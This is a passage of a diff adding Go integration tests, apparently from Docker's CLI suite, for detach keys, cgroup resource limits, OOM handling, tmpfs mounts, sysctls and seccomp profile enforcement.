c.Assert(err, checker.IsNil) + + // Then do the work + name := "attach-detach" + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", "--detach-keys=ctrl-a,a", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + c.Assert(waitRun(name), check.IsNil) + + if _, err := cpty.Write([]byte("hello\n")); err != nil { + c.Fatal(err) + } + + out, err := bufio.NewReader(stdout).ReadString('\n') + if err != nil { + c.Fatal(err) + } + if strings.TrimSpace(out) != "hello" { + c.Fatalf("expected 'hello', got %q", out) + } + + // escape sequence + if _, err := cpty.Write(keyCtrlA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + + ch := make(chan struct{}) + go func() { + cmd.Wait() + ch <- struct{}{} + }() + + select { + case <-ch: + case <-time.After(10 * time.Second): + c.Fatal("timed out waiting for container to exit") + } + + running := inspectField(c, name, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) +} + +func (s *DockerSuite) TestRunAttachInvalidDetachKeySequencePreserved(c *check.C) { + name := "attach-detach" + keyA := []byte{97} + keyB := []byte{98} + + dockerCmd(c, "run", "--name", name, "-itd", "busybox", "cat") + + cmd := exec.Command(dockerBinary, "attach", "--detach-keys=a,b,c", name) + stdout, err := cmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + cpty, tty, err := pty.Open() + if err != nil { + c.Fatal(err) + } + defer cpty.Close() + cmd.Stdin = tty + if err := cmd.Start(); err != nil { + c.Fatal(err) + } + c.Assert(waitRun(name), check.IsNil) + + // Invalid escape sequence aba, should print aba in output + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyB); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write(keyA); err != nil { + c.Fatal(err) + } + time.Sleep(100 * time.Millisecond) + if _, err := cpty.Write([]byte("\n")); err != nil { + c.Fatal(err) + } + + out, err := bufio.NewReader(stdout).ReadString('\n') + if err != nil { + c.Fatal(err) + } + if strings.TrimSpace(out) != "aba" { + c.Fatalf("expected 'aba', got %q", out) + } +} + +// "test" should be printed +func (s *DockerSuite) TestRunWithCPUQuota(c *check.C) { + testRequires(c, cpuCfsQuota) + + file := "/sys/fs/cgroup/cpu/cpu.cfs_quota_us" + out, _ := dockerCmd(c, "run", "--cpu-quota", "8000", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "8000") + + out = inspectField(c, "test", "HostConfig.CpuQuota") + c.Assert(out, checker.Equals, "8000", check.Commentf("setting the CPU CFS quota failed")) +} + +func (s *DockerSuite) TestRunWithCpuPeriod(c *check.C) { + testRequires(c, cpuCfsPeriod) + + file := "/sys/fs/cgroup/cpu/cpu.cfs_period_us" + out, _ := dockerCmd(c, "run", "--cpu-period", "50000", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "50000") + + out, _ = dockerCmd(c, "run", "--cpu-period", "0", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "100000") + + out = inspectField(c, "test", "HostConfig.CpuPeriod") + c.Assert(out, checker.Equals, "50000", check.Commentf("setting the CPU CFS period failed")) +} + +func (s *DockerSuite) TestRunWithInvalidCpuPeriod(c *check.C) { + testRequires(c, cpuCfsPeriod) + out, _, err := dockerCmdWithError("run", "--cpu-period", "900", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "CPU cfs period can not be less than 1ms (i.e. 1000) or larger than 1s (i.e. 1000000)" + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--cpu-period", "2000000", "busybox", "true") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--cpu-period", "-3", "busybox", "true") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunWithKernelMemory(c *check.C) { + testRequires(c, kernelMemorySupport) + + file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes" + stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "--kernel-memory", "50M", "--name", "test1", "busybox", "cat", file) + c.Assert(strings.TrimSpace(stdout), checker.Equals, "52428800") + + out := inspectField(c, "test1", "HostConfig.KernelMemory") + c.Assert(out, check.Equals, "52428800") +} + +func (s *DockerSuite) TestRunWithInvalidKernelMemory(c *check.C) { + testRequires(c, kernelMemorySupport) + + out, _, err := dockerCmdWithError("run", "--kernel-memory", "2M", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Minimum kernel memory limit allowed is 4MB" + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--kernel-memory", "-16m", "--name", "test2", "busybox", "echo", "test") + c.Assert(err, check.NotNil) + expected = "invalid size" + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunWithCPUShares(c *check.C) { + testRequires(c, cpuShare) + + file := "/sys/fs/cgroup/cpu/cpu.shares" + out, _ := dockerCmd(c, "run", "--cpu-shares", "1000", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "1000") + + out = inspectField(c, "test", "HostConfig.CPUShares") + c.Assert(out, check.Equals, "1000") +} + +// "test" should be printed +func (s *DockerSuite) TestRunEchoStdoutWithCPUSharesAndMemoryLimit(c *check.C) { + testRequires(c, cpuShare) + testRequires(c, memoryLimitSupport) + out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--cpu-shares", "1000", "-m", "32m", "busybox", "echo", "test") + c.Assert(out, checker.Equals, "test\n", check.Commentf("container should've printed 'test'")) +} + +func (s *DockerSuite) TestRunWithCpusetCpus(c *check.C) { + testRequires(c, cgroupCpuset) + + file := "/sys/fs/cgroup/cpuset/cpuset.cpus" + out, _ := dockerCmd(c, "run", "--cpuset-cpus", "0", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + out = inspectField(c, "test", "HostConfig.CpusetCpus") + c.Assert(out, check.Equals, "0") +} + +func (s *DockerSuite) TestRunWithCpusetMems(c *check.C) { + testRequires(c, cgroupCpuset) + + file := "/sys/fs/cgroup/cpuset/cpuset.mems" + out, _ := dockerCmd(c, "run", "--cpuset-mems", "0", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + out = inspectField(c, "test", "HostConfig.CpusetMems") + c.Assert(out, check.Equals, "0") +} + +func (s *DockerSuite) TestRunWithBlkioWeight(c *check.C) { + testRequires(c, blkioWeight) + + file := "/sys/fs/cgroup/blkio/blkio.weight" + out, _ := dockerCmd(c, "run", "--blkio-weight", "300", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "300") + + out = inspectField(c, "test", "HostConfig.BlkioWeight") + c.Assert(out, check.Equals, "300") +} + +func (s *DockerSuite) TestRunWithInvalidBlkioWeight(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--blkio-weight", "5", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) + expected := "Range of blkio weight is from 10 to 1000" + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioWeightDevice(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--blkio-weight-device", "/dev/sdX:100", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceReadBps(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--device-read-bps", "/dev/sdX:500", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceWriteBps(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--device-write-bps", "/dev/sdX:500", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceReadIOps(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--device-read-iops", "/dev/sdX:500", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceWriteIOps(c *check.C) { + testRequires(c, blkioWeight) + out, _, err := dockerCmdWithError("run", "--device-write-iops", "/dev/sdX:500", "busybox", "true") + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerSuite) TestRunOOMExitCode(c *check.C) { + testRequires(c, memoryLimitSupport, swapMemorySupport) + errChan := make(chan error) + go func() { + defer close(errChan) + out, exitCode, _ := dockerCmdWithError("run", "-m", "4MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + if expected := 137; exitCode != expected { + errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out) + } + }() + + select { + case err := <-errChan: + c.Assert(err, check.IsNil) + case <-time.After(600 * time.Second): + c.Fatal("Timeout waiting for container to die on OOM") + } +} + +func (s *DockerSuite) TestRunWithMemoryLimit(c *check.C) { + testRequires(c, memoryLimitSupport) + + file := "/sys/fs/cgroup/memory/memory.limit_in_bytes" + stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "-m", "32M", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(stdout), checker.Equals, "33554432") + + out := inspectField(c, "test", "HostConfig.Memory") + c.Assert(out, check.Equals, "33554432") +} + +// TestRunWithoutMemoryswapLimit sets memory limit and disables swap +// memory limit, this means the processes in the container can use +// 16M memory and as much swap memory as they need (if the host +// supports swap memory). +func (s *DockerSuite) TestRunWithoutMemoryswapLimit(c *check.C) { + testRequires(c, DaemonIsLinux) + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + dockerCmd(c, "run", "-m", "32m", "--memory-swap", "-1", "busybox", "true") +} + +func (s *DockerSuite) TestRunWithSwappiness(c *check.C) { + testRequires(c, memorySwappinessSupport) + file := "/sys/fs/cgroup/memory/memory.swappiness" + out, _ := dockerCmd(c, "run", "--memory-swappiness", "0", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "0") + + out = inspectField(c, "test", "HostConfig.MemorySwappiness") + c.Assert(out, check.Equals, "0") +} + +func (s *DockerSuite) TestRunWithSwappinessInvalid(c *check.C) { + testRequires(c, memorySwappinessSupport) + out, _, err := dockerCmdWithError("run", "--memory-swappiness", "101", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Valid memory swappiness range is 0-100" + c.Assert(out, checker.Contains, expected, check.Commentf("Expected output to contain %q, not %q", out, expected)) + + out, _, err = dockerCmdWithError("run", "--memory-swappiness", "-10", "busybox", "true") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, expected, check.Commentf("Expected output to contain %q, not %q", out, expected)) +} + +func (s *DockerSuite) TestRunWithMemoryReservation(c *check.C) { + testRequires(c, memoryReservationSupport) + + file := "/sys/fs/cgroup/memory/memory.soft_limit_in_bytes" + out, _ := dockerCmd(c, "run", "--memory-reservation", "200M", "--name", "test", "busybox", "cat", file) + c.Assert(strings.TrimSpace(out), checker.Equals, "209715200") + + out = inspectField(c, "test", "HostConfig.MemoryReservation") + c.Assert(out, check.Equals, "209715200") +} + +func (s *DockerSuite) TestRunWithMemoryReservationInvalid(c *check.C) { + testRequires(c, memoryLimitSupport) + testRequires(c, memoryReservationSupport) + out, _, err := dockerCmdWithError("run", "-m", "500M", "--memory-reservation", "800M", "busybox", "true") + c.Assert(err, check.NotNil) + expected := "Minimum memory limit can not be less than memory reservation limit" + c.Assert(strings.TrimSpace(out), checker.Contains, expected, check.Commentf("run container should fail with invalid memory reservation")) + + out, _, err = dockerCmdWithError("run", "--memory-reservation", "1k", "busybox", "true") + c.Assert(err, check.NotNil) + expected = "Minimum memory reservation allowed is 4MB" + c.Assert(strings.TrimSpace(out), checker.Contains, expected, check.Commentf("run container should fail with invalid memory reservation")) +} + +func (s *DockerSuite) TestStopContainerSignal(c *check.C) { + out, _ := dockerCmd(c, "run", "--stop-signal", "SIGUSR1", "-d", "busybox", "/bin/sh", "-c", `trap 'echo "exit trapped"; exit 0' USR1; while true; do sleep 1; done`) + containerID := strings.TrimSpace(out) + + c.Assert(waitRun(containerID), checker.IsNil) + + dockerCmd(c, "stop", containerID) + out, _ = dockerCmd(c, "logs", containerID) + + c.Assert(out, checker.Contains, "exit trapped", check.Commentf("Expected `exit trapped` in the log")) +} + +func (s *DockerSuite) TestRunSwapLessThanMemoryLimit(c *check.C) { + testRequires(c, memoryLimitSupport) + testRequires(c, swapMemorySupport) + out, _, err := dockerCmdWithError("run", "-m", "16m", "--memory-swap", "15m", "busybox", "echo", "test") + expected := "Minimum memoryswap limit should be larger than memory limit" + c.Assert(err, check.NotNil) + + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunInvalidCpusetCpusFlagValue(c *check.C) { + testRequires(c, cgroupCpuset, SameHostDaemon) + + sysInfo := sysinfo.New(true) + cpus, err := parsers.ParseUintList(sysInfo.Cpus) + c.Assert(err, check.IsNil) + var invalid int + for i := 0; i <= len(cpus)+1; i++ { + if !cpus[i] { + invalid = i + break + } + } + out, _, err := dockerCmdWithError("run", "--cpuset-cpus", strconv.Itoa(invalid), "busybox", "true") + c.Assert(err, check.NotNil) + expected := fmt.Sprintf("Error response from daemon: Requested CPUs are not available - requested %s, available: %s", strconv.Itoa(invalid), sysInfo.Cpus) + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunInvalidCpusetMemsFlagValue(c *check.C) { + testRequires(c, cgroupCpuset) + + sysInfo := sysinfo.New(true) + mems, err := parsers.ParseUintList(sysInfo.Mems) + c.Assert(err, check.IsNil) + var invalid int + for i := 0; i <= len(mems)+1; i++ { + if !mems[i] { + invalid = i + break + } + } + out, _, err := dockerCmdWithError("run", "--cpuset-mems", strconv.Itoa(invalid), "busybox", "true") + c.Assert(err, check.NotNil) + expected := fmt.Sprintf("Error response from daemon: Requested memory nodes are not available - requested %s, available: %s", strconv.Itoa(invalid), sysInfo.Mems) + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunInvalidCPUShares(c *check.C) { + testRequires(c, cpuShare, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--cpu-shares", "1", "busybox", "echo", "test") + c.Assert(err, check.NotNil, check.Commentf(out)) + expected := "The minimum allowed cpu-shares is 2" + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--cpu-shares", "-1", "busybox", "echo", "test") + c.Assert(err, check.NotNil, check.Commentf(out)) + expected = "shares: invalid argument" + c.Assert(out, checker.Contains, expected) + + out, _, err = dockerCmdWithError("run", "--cpu-shares", "99999999", "busybox", "echo", "test") + c.Assert(err, check.NotNil, check.Commentf(out)) + expected = "The maximum allowed cpu-shares is" + c.Assert(out, checker.Contains, expected) +} + +func (s *DockerSuite) TestRunWithDefaultShmSize(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "shm-default" + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "mount") + shmRegex := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=65536k`) + if !shmRegex.MatchString(out) { + c.Fatalf("Expected shm of 64MB in mount command, got %v", out) + } + shmSize := inspectField(c, name, "HostConfig.ShmSize") + c.Assert(shmSize, check.Equals, "67108864") +} + +func (s *DockerSuite) TestRunWithShmSize(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "shm" + out, _ := dockerCmd(c, "run", "--name", name, "--shm-size=1G", "busybox", "mount") + shmRegex := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=1048576k`) + if !shmRegex.MatchString(out) { + c.Fatalf("Expected shm of 1GB in mount command, got %v", out) + } + shmSize := inspectField(c, name, "HostConfig.ShmSize") + c.Assert(shmSize, check.Equals, "1073741824") +} + +func (s *DockerSuite) TestRunTmpfsMountsEnsureOrdered(c *check.C) { + tmpFile, err := ioutil.TempFile("", "test") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + out, _ := dockerCmd(c, "run", "--tmpfs", "/run", "-v", tmpFile.Name()+":/run/test", "busybox", "ls", "/run") + c.Assert(out, checker.Contains, "test") +} + +func (s *DockerSuite) TestRunTmpfsMounts(c *check.C) { + // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // Windows does not support tmpfs mounts. + testRequires(c, DaemonIsLinux) + if out, _, err := dockerCmdWithError("run", "--tmpfs", "/run", "busybox", "touch", "/run/somefile"); err != nil { + c.Fatalf("/run directory not mounted on tmpfs %q %s", err, out) + } + if out, _, err := dockerCmdWithError("run", "--tmpfs", "/run:noexec", "busybox", "touch", "/run/somefile"); err != nil { + c.Fatalf("/run directory not mounted on tmpfs %q %s", err, out) + } + if out, _, err := dockerCmdWithError("run", "--tmpfs", "/run:noexec,nosuid,rw,size=5k,mode=700", "busybox", "touch", "/run/somefile"); err != nil { + c.Fatalf("/run failed to mount on tmpfs with valid options %q %s", err, out) + } + if _, _, err := dockerCmdWithError("run", "--tmpfs", "/run:foobar", "busybox", "touch", "/run/somefile"); err == nil { + c.Fatalf("/run mounted on tmpfs when it should have vailed within invalid mount option") + } + if _, _, err := dockerCmdWithError("run", "--tmpfs", "/run", "-v", "/run:/run", "busybox", "touch", "/run/somefile"); err == nil { + c.Fatalf("Should have generated an error saying Duplicate mount points") + } +} + +func (s *DockerSuite) TestRunTmpfsMountsOverrideImageVolumes(c *check.C) { + name := "img-with-volumes" + _, err := buildImage( + name, + ` + FROM busybox + VOLUME /run + RUN touch /run/stuff + `, + true) + if err != nil { + c.Fatal(err) + } + out, _ := dockerCmd(c, "run", "--tmpfs", "/run", name, "ls", "/run") + c.Assert(out, checker.Not(checker.Contains), "stuff") +} + +// Test case for #22420 +func (s *DockerSuite) TestRunTmpfsMountsWithOptions(c *check.C) { + testRequires(c, DaemonIsLinux) + + expectedOptions := []string{"rw", "nosuid", "nodev", "noexec", "relatime"} + out, _ := dockerCmd(c, "run", "--tmpfs", "/tmp", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } + c.Assert(out, checker.Not(checker.Contains), "size=") + + expectedOptions = []string{"rw", "nosuid", "nodev", "noexec", "relatime"} + out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:rw", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } + c.Assert(out, checker.Not(checker.Contains), "size=") + + expectedOptions = []string{"rw", "nosuid", "nodev", "relatime", "size=8192k"} + out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:rw,exec,size=8192k", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } + + expectedOptions = []string{"rw", "nosuid", "nodev", "noexec", "relatime", "size=4096k"} + out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:rw,size=8192k,exec,size=4096k,noexec", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } + + // We use debian:jessie as there is no findmnt in busybox. Also the output will be in the format of + // TARGET PROPAGATION + // /tmp shared + // so we only capture `shared` here. + expectedOptions = []string{"shared"} + out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:shared", "debian:jessie", "findmnt", "-o", "TARGET,PROPAGATION", "/tmp") + for _, option := range expectedOptions { + c.Assert(out, checker.Contains, option) + } +} + +func (s *DockerSuite) TestRunSysctls(c *check.C) { + + testRequires(c, DaemonIsLinux) + var err error + + out, _ := dockerCmd(c, "run", "--sysctl", "net.ipv4.ip_forward=1", "--name", "test", "busybox", "cat", "/proc/sys/net/ipv4/ip_forward") + c.Assert(strings.TrimSpace(out), check.Equals, "1") + + out = inspectFieldJSON(c, "test", "HostConfig.Sysctls") + + sysctls := make(map[string]string) + err = json.Unmarshal([]byte(out), &sysctls) + c.Assert(err, check.IsNil) + c.Assert(sysctls["net.ipv4.ip_forward"], check.Equals, "1") + + out, _ = dockerCmd(c, "run", "--sysctl", "net.ipv4.ip_forward=0", "--name", "test1", "busybox", "cat", "/proc/sys/net/ipv4/ip_forward") + c.Assert(strings.TrimSpace(out), check.Equals, "0") + + out = inspectFieldJSON(c, "test1", "HostConfig.Sysctls") + + err = json.Unmarshal([]byte(out), &sysctls) + c.Assert(err, check.IsNil) + c.Assert(sysctls["net.ipv4.ip_forward"], check.Equals, "0") + + runCmd := exec.Command(dockerBinary, "run", "--sysctl", "kernel.foobar=1", "--name", "test2", "busybox", "cat", "/proc/sys/kernel/foobar") + out, _, _ = runCommandWithOutput(runCmd) + if !strings.Contains(out, "invalid argument") { + c.Fatalf("expected --sysctl to fail, got %s", out) + } +} + +// TestRunSeccompProfileDenyUnshare checks that 'docker run --security-opt seccomp=/tmp/profile.json debian:jessie unshare' exits with operation not permitted. +func (s *DockerSuite) TestRunSeccompProfileDenyUnshare(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, NotArm, Apparmor) + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "unshare", + "action": "SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + if err != nil { + c.Fatal(err) + } + defer tmpFile.Close() + + if _, err := tmpFile.Write([]byte(jsonData)); err != nil { + c.Fatal(err) + } + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc") + out, _, _ := runCommandWithOutput(runCmd) + if !strings.Contains(out, "Operation not permitted") { + c.Fatalf("expected unshare with seccomp profile denied to fail, got %s", out) + } +} + +// TestRunSeccompProfileDenyChmod checks that 'docker run --security-opt seccomp=/tmp/profile.json busybox chmod 400 /etc/hostname' exits with operation not permitted. +func (s *DockerSuite) TestRunSeccompProfileDenyChmod(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + jsonData := `{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "chmod", + "action": "SCMP_ACT_ERRNO" + }, + { + "name":"fchmod", + "action": "SCMP_ACT_ERRNO" + }, + { + "name": "fchmodat", + "action":"SCMP_ACT_ERRNO" + } + ] +}` + tmpFile, err := ioutil.TempFile("", "profile.json") + c.Assert(err, check.IsNil) + defer tmpFile.Close() + + if _, err := tmpFile.Write([]byte(jsonData)); err != nil { + c.Fatal(err) + } + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "400", "/etc/hostname") + out, _, _ := runCommandWithOutput(runCmd) + if !strings.Contains(out, "Operation not permitted") { + c.Fatalf("expected chmod with seccomp profile denied to fail, got %s", out) + } +} + +// TestRunSeccompProfileDenyUnshareUserns checks that 'docker run debian:jessie unshare --map-root-user --user sh -c whoami' with a specific profile to +// deny unhare of a userns exits with operation not permitted. +func (s *DockerSuite) TestRunSeccompProfileDenyUnshareUserns(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, NotArm, Apparmor) + // from sched.h + jsonData := fmt.Sprintf(`{ + "defaultAction": "SCMP_ACT_ALLOW", + "syscalls": [ + { + "name": "unshare", + "action": "SCMP_ACT_ERRNO", + "args": [ + { + "index": 0, + "value": %d, + "op": "SCMP_CMP_EQ" + } + ] + } + ] +}`, uint64(0x10000000)) + tmpFile, err := ioutil.TempFile("", "profile.json") + if err != nil { + c.Fatal(err) + } + defer tmpFile.Close() + + if _, err := tmpFile.Write([]byte(jsonData)); err != nil { + c.Fatal(err) + } + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami") + out, _, _ := runCommandWithOutput(runCmd) + if !strings.Contains(out, "Operation not permitted") { + c.Fatalf("expected unshare userns with seccomp profile denied to fail, got %s", out) + } +} + +// TestRunSeccompProfileDenyCloneUserns checks that 'docker run syscall-test' +// with a the default seccomp profile exits with operation not permitted. +func (s *DockerSuite) TestRunSeccompProfileDenyCloneUserns(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + ensureSyscallTest(c) + + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "userns-test", "id") + out, _, err := runCommandWithOutput(runCmd) + if err == nil || !strings.Contains(out, "clone failed: Operation not permitted") { + c.Fatalf("expected clone userns with default seccomp profile denied to fail, got %s: %v", out, err) + } +} + +// TestRunSeccompUnconfinedCloneUserns checks that +// 'docker run --security-opt seccomp=unconfined syscall-test' allows creating a userns. +func (s *DockerSuite) TestRunSeccompUnconfinedCloneUserns(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, UserNamespaceInKernel, NotUserNamespace, unprivilegedUsernsClone) + ensureSyscallTest(c) + + // make sure running w privileged is ok + runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "syscall-test", "userns-test", "id") + if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") { + c.Fatalf("expected clone userns with --security-opt seccomp=unconfined to succeed, got %s: %v", out, err) + } +} + +// TestRunSeccompAllowPrivCloneUserns checks that 'docker run --privileged syscall-test' +// allows creating a userns. +func (s *DockerSuite) TestRunSeccompAllowPrivCloneUserns(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, UserNamespaceInKernel, NotUserNamespace) + ensureSyscallTest(c) + + // make sure running w privileged is ok + runCmd := exec.Command(dockerBinary, "run", "--privileged", "syscall-test", "userns-test", "id") + if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") { + c.Fatalf("expected clone userns with --privileged to succeed, got %s: %v", out, err) + } +} + +// TestRunSeccompProfileAllow32Bit checks that 32 bit code can run on x86_64 +// with the default seccomp profile. +func (s *DockerSuite) TestRunSeccompProfileAllow32Bit(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, IsAmd64) + ensureSyscallTest(c) + + runCmd := exec.Command(dockerBinary, "run", "syscall-test", "exit32-test", "id") + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("expected to be able to run 32 bit code, got %s: %v", out, err) + } +} + +// TestRunSeccompAllowSetrlimit checks that 'docker run debian:jessie ulimit -v 1048510' succeeds. +func (s *DockerSuite) TestRunSeccompAllowSetrlimit(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled) + + // ulimit uses setrlimit, so we want to make sure we don't break it + runCmd := exec.Command(dockerBinary, "run", "debian:jessie", "bash", "-c", "ulimit -v 1048510") + if out, _, err := runCommandWithOutput(runCmd); err != nil { + c.Fatalf("expected ulimit with seccomp to succeed, got %s: %v", out, err) + } +} + +func (s *DockerSuite) TestRunSeccompDefaultProfileAcct(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, NotUserNamespace) + ensureSyscallTest(c) + + out, _, err := dockerCmdWithError("run", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "Operation not permitted") { + c.Fatalf("test 0: expected Operation not permitted, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "sys_admin", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "Operation not permitted") { + c.Fatalf("test 1: expected Operation not permitted, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "sys_pacct", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("test 2: expected No such file or directory, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("test 3: expected No such file or directory, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-drop", "ALL", "--cap-add", "sys_pacct", "syscall-test", "acct-test") + if err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("test 4: expected No such file or directory, got: %s", out) + } +} + +func (s *DockerSuite) TestRunSeccompDefaultProfileNS(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, NotUserNamespace) + ensureSyscallTest(c) + + out, _, err := dockerCmdWithError("run", "syscall-test", "ns-test", "echo", "hello0") + if err == nil || !strings.Contains(out, "Operation not permitted") { + c.Fatalf("test 0: expected Operation not permitted, got: %s", out) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "sys_admin", "syscall-test", "ns-test", "echo", "hello1") + if err != nil || !strings.Contains(out, "hello1") { + c.Fatalf("test 1: expected hello1, got: %s, %v", out, err) + } + + out, _, err = dockerCmdWithError("run", "--cap-drop", "all", "--cap-add", "sys_admin", "syscall-test", "ns-test", "echo", "hello2") + if err != nil || !strings.Contains(out, "hello2") { + c.Fatalf("test 2: expected hello2, got: %s, %v", out, err) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "syscall-test", "ns-test", "echo", "hello3") + if err != nil || !strings.Contains(out, "hello3") { + c.Fatalf("test 3: expected hello3, got: %s, %v", out, err) + } + + out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "--security-opt", "seccomp=unconfined", "syscall-test", "acct-test") 